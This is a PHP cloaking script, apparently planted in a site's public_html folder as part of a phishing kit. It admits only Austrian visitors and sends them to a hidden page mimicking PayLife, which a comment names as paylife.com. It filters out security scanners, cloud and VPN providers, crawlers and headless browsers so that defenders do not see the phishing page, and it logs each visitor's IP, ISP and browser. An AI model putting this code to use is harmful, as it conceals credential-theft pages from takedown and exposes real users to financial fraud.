File: /home/axxoncom/domains/coregroup.pk/public_html/austria/index.php
<?php
session_start();
function get_ip() {
if (!empty($_SERVER['HTTP_CLIENT_IP'])) return $_SERVER['HTTP_CLIENT_IP'];
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) return trim(explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0]);
return $_SERVER['REMOTE_ADDR'];
}
$ip = get_ip();
$details = @json_decode(file_get_contents("http://ip-api.com/json/{$ip}"), true);
$country = $details['country'] ?? 'Unknown';
$isp = $details['isp'] ?? 'Unknown';
$user_agent = strtolower($_SERVER['HTTP_USER_AGENT']);
// ✅ Allow only Austria
$allowed_countries = [
'Austria'
];
// ✅ Always allowed IPs (whitelist)
$allowed_ips = [
'127.0.0.1',
'::1'
];
// ❌ Always blocked IPs (blacklist)
$blocked_ips = [
'203.0.113.45',
'198.51.100.23'
];
// ❌ Blocked ISPs (even if Austria)
$blocked_isps = [
// Cloud & Hosting Providers
'Amazon Technologies Inc.',
'Amazon.com, Inc.',
'Microsoft Corporation',
'Google LLC',
'DigitalOcean, LLC',
'Linode, LLC',
'Vultr Holdings, LLC',
'OVH SAS',
'Hetzner Online GmbH',
'Contabo GmbH',
'GoDaddy LLC',
'Namecheap, Inc.',
// VPN & Proxy Services
'NordVPN',
'ExpressVPN',
'CyberGhost',
'Private Internet Access',
'Proton Technologies AG',
'Tor Project',
'HideMyAss',
'PureVPN',
'Windscribe',
'Surfshark',
// Data Centers & Bot Networks
'Datacamp',
'Datacamp Limited',
'Cogent Communications',
'IPAX Internet Services',
'Riepert Informationstechnologie GmbH',
'Alibaba Cloud',
'Tencent Cloud',
'Oracle Cloud',
'IBM Cloud',
'Rackspace Hosting',
// Scanning & Security Companies
'Shodan',
'Censys',
'BinaryEdge',
'ZoomEye',
'RiskIQ',
'Project 254',
// Other suspicious providers
'BadISP Ltd.',
'Evil Hosting GmbH'
];
// ❌ Blocked User-Agents (bots, crawlers, scanners)
$blocked_bots = [
// Search Engine Bots
'googlebot', 'bingbot', 'yahoo', 'baiduspider', 'yandexbot', 'duckduckbot',
// Social Media Bots
'facebookexternalhit', 'twitterbot', 'linkedinbot', 'pinterest',
// Analytics & Monitoring
'ahrefsbot', 'semrushbot', 'moz.com', 'majestic', 'screaming frog',
// Scrapers & Crawlers
'scrapy', 'beautifulsoup', 'mechanize', 'guzzle', 'requests',
// Programming Languages/Tools
'python', 'perl', 'java', 'curl', 'wget', 'php', 'golang', 'node.js',
// Generic Bot Indicators
'bot', 'crawl', 'spider', 'scraper', 'scan', 'monitor', 'checker',
'analyzer', 'indexer', 'fetcher', 'collector', 'extractor',
// Headless Browsers
'headless', 'phantomjs', 'selenium', 'puppeteer', 'playwright',
// Security Scanners
'nmap', 'nessus', 'openvas', 'metasploit', 'burp', 'sqlmap', 'nikto',
// Miscellaneous
'feed', 'rss', 'aggregator', 'api', 'library', 'framework'
];
// Enhanced Bot Detection
$blocked = false;
foreach ($blocked_bots as $bot) {
if (strpos($user_agent, $bot) !== false) {
$blocked = true;
break;
}
}
// Additional Bot Detection Patterns
$suspicious_patterns = [
// No user agent
'/^$/',
// Very short user agents
'/^.{0,10}$/',
// Common bot patterns
'/bot[^a-z]/i',
'/crawler/i',
'/spider/i',
'/scraper/i',
// Programming language user agents
'/python|perl|java|ruby|golang|node/i',
// HTTP libraries
'/libwww|http.client|okhttp|axios/i'
];
foreach ($suspicious_patterns as $pattern) {
if (preg_match($pattern, $user_agent)) {
$blocked = true;
break;
}
}
// Access Logic
if (in_array($ip, $blocked_ips)) {
$access_granted = false;
$reason = "BLOCKED_IP";
} elseif (in_array($ip, $allowed_ips)) {
$access_granted = true;
$reason = "WHITELISTED_IP";
} elseif ($blocked) {
$access_granted = false;
$reason = "BOT_DETECTED";
} elseif (in_array($isp, $blocked_isps)) {
$access_granted = false;
$reason = "BLOCKED_ISP";
} elseif ($country === 'Austria') {
$access_granted = true;
$reason = "AUSTRIA_ALLOWED";
} else {
$access_granted = false;
$reason = "COUNTRY_BLOCKED";
}
// Enhanced Logging
$log = sprintf(
"%s | %s | %s | %s | %s | %s | UA: %s\n",
$ip,
$country,
$isp,
date("Y-m-d H:i:s"),
$access_granted ? 'GRANTED' : 'BLOCKED',
$reason,
$_SERVER['HTTP_USER_AGENT']
);
file_put_contents('visitor.txt', $log, FILE_APPEND | LOCK_EX);
// Additional Security Headers
header("X-Frame-Options: DENY");
header("X-Content-Type-Options: nosniff");
header("Referrer-Policy: strict-origin-when-cross-origin");
// Redirect logic
if ($access_granted) {
// Redirect to paylife.com when access is granted
header("Location: https://alarafi.net/wp-content/themes/twentytwenty/inc/jam31/visitor/P_YLlFE/");
exit();
} else {
// Optional: Add delay to slow down bots
if ($reason === "BOT_DETECTED") {
sleep(2);
}
header("Location: radio.php");
exit();
}
// Optional: Rate limiting for additional security
$rate_limit_key = 'rate_limit_' . md5($ip);
if (!isset($_SESSION[$rate_limit_key])) {
$_SESSION[$rate_limit_key] = [
'count' => 1,
'first_access' => time()
];
} else {
$_SESSION[$rate_limit_key]['count']++;
// Block if more than 10 requests per minute
if ($_SESSION[$rate_limit_key]['count'] > 10 &&
(time() - $_SESSION[$rate_limit_key]['first_access']) < 60) {
$log = sprintf(
"%s | %s | %s | %s | RATE_LIMITED | Too many requests\n",
$ip,
$country,
$isp,
date("Y-m-d H:i:s")
);
file_put_contents('visitor.txt', $log, FILE_APPEND | LOCK_EX);
header("HTTP/1.1 429 Too Many Requests");
header("Location: deny.php");
exit();
}
}
?>